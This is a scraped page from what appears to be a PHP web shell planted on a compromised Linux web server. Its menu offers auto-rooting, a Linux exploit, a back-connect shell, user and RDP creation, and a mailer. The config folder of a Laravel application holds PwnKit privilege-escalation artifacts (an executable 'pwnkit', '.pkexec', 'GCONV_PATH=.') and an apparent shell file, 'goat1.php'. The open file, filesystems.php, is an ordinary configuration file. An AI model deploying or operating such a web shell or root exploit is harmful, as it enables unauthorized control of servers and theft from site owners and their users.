Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.138
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo5.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
iosCertificates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
api.php
1.03
KB
-rw-r--r--
app.php
10.93
KB
-rw-r--r--
auth.php
3.74
KB
-rw-r--r--
backup.php
9.11
KB
-rw-r--r--
broadcasting.php
2.21
KB
-rw-r--r--
cache.php
3.07
KB
-rw-r--r--
cashier.php
4.96
KB
-rw-r--r--
cors.php
1.09
KB
-rw-r--r--
database.php
4.99
KB
-rw-r--r--
datatables-buttons.php
2.22
KB
-rw-r--r--
datatables-html.php
719
B
-rw-r--r--
debugbar.php
8.49
KB
-rw-r--r--
dompdf.php
11.14
KB
-rw-r--r--
entrust.php
5.13
KB
-rw-r--r--
entrust_seeder.php
560
B
-rw-r--r--
error_log
15.56
KB
-rw-r--r--
excel.php
11.97
KB
-rw-r--r--
filesystems.php
4.49
KB
-rw-r--r--
flutterwave.php
749
B
-rw-r--r--
fortify.php
4.74
KB
-rw-r--r--
froiden_envato.php
1.79
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
imap.php
7.79
KB
-rw-r--r--
installer.php
1.29
KB
-rw-r--r--
laravel-device-tracking.php
785
B
-rw-r--r--
laravel_google_translate.php
552
B
-rw-r--r--
location.php
3.59
KB
-rw-r--r--
log-viewer.php
7.05
KB
-rw-r--r--
logcleaner.php
907
B
-rw-r--r--
logging.php
2.93
KB
-rw-r--r--
mail.php
3.45
KB
-rw-r--r--
modules.php
10.41
KB
-rw-r--r--
mollie.php
1.93
KB
-rw-r--r--
onesignal.php
537
B
-rw-r--r--
payfast.php
1.37
KB
-rw-r--r--
paystack.php
724
B
-rw-r--r--
pushnotification.php
530
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
3.37
KB
-rw-r--r--
sanctum.php
2.24
KB
-rw-r--r--
sentry.php
1.7
KB
-rw-r--r--
services.php
3.07
KB
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
translation-manager.php
1.45
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
xss_ignore.php
461
B
-rw-r--r--
zoom.php
443
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filesystems.php
<?php use App\Helper\Files; return [ /* |-------------------------------------------------------------------------- | Default Filesystem Disk |-------------------------------------------------------------------------- | | Here you may specify the default filesystem disk that should be used | by the framework. The "local" disk, as well as a variety of cloud | based disks are available to your application. Just store away! | */ 'default' => env('FILESYSTEM_DRIVER', 'local'), /* |-------------------------------------------------------------------------- | Default Cloud Filesystem Disk |-------------------------------------------------------------------------- | | Many applications store files both locally and in the cloud. For this | reason, you may specify a default "cloud" driver here. This driver | will be bound as the Cloud disk implementation in the container. | */ 'cloud' => env('FILESYSTEM_CLOUD', 's3'), /* |-------------------------------------------------------------------------- | Filesystem Disks |-------------------------------------------------------------------------- | | Here you may configure as many filesystem "disks" as you wish, and you | may even configure multiple disks of the same driver. Defaults have | been setup for each driver as an example of the required options. | | Supported Drivers: "local", "ftp", "sftp", "s3" | */ 'disks' => [ 'customFtp' => [ 'driver' => 'ftp', 'host' => env('FTP_HOST'), 'username' => env('FTP_USERNAME'), 'password' => env('FTP_PASSWORD'), ], 'local' => [ 'driver' => 'local', 'root' => public_path(Files::UPLOAD_FOLDER), ], 'public' => [ 'driver' => 'local', 'root' => storage_path('app/public'), 'url' => env('APP_URL') . '/storage', 'visibility' => 'public', ], 's3' => [ 'driver' => 's3', 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION'), 'bucket' => env('AWS_BUCKET'), 'url' => env('AWS_URL'), 'endpoint' => env('AWS_ENDPOINT'), ], 'aws_s3' => [ 'driver' => 's3', 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION'), 'bucket' => env('AWS_BUCKET'), 'url' => env('AWS_URL'), 'endpoint' => env('AWS_ENDPOINT'), ], 'digitalocean' => [ 'driver' => 's3', 'key' => env('DIGITALOCEAN_SPACES_KEY'), 'secret' => env('DIGITALOCEAN_SPACES_SECRET'), 'endpoint' => env('DIGITALOCEAN_SPACES_ENDPOINT'), 'region' => env('DIGITALOCEAN_SPACES_REGION'), 'bucket' => env('DIGITALOCEAN_SPACES_BUCKET') ], 'wasabi' => [ 'driver' => 's3', 'key' => env('WASABI_ACCESS_KEY_ID'), 'secret' => env('WASABI_SECRET_ACCESS_KEY'), 'region' => env('WASABI_DEFAULT_REGION', 'eu-central-1'), 'bucket' => env('WASABI_BUCKET'), 'endpoint' => env('WASABI_ENDPOINT', 'https://s3.wasabisys.com'), ], 'minio' => [ 'driver' => 's3', 'use_path_style_endpoint' => true, 'key' => env('MINIO_ACCESS_KEY_ID'), 'secret' => env('MINIO_SECRET_ACCESS_KEY'), 'region' => env('MINIO_DEFAULT_REGION', 'us-east-1'), 'bucket' => env('MINIO_BUCKET'), 'endpoint' => env('MINIO_ENDPOINT', ''), ], 'storage' => [ 'driver' => 'local', 'root' => storage_path('app'), ], 'localBackup' => [ 'driver' => 'local', 'root' => storage_path(''), ], ], /* |-------------------------------------------------------------------------- | Symbolic Links |-------------------------------------------------------------------------- | | Here you may configure the symbolic links that will be created when the | `storage:link` Artisan command is executed. The array keys should be | the locations of the links and the values should be their targets. | */ 'links' => [ public_path('storage') => storage_path('app/public'), ], ];
Close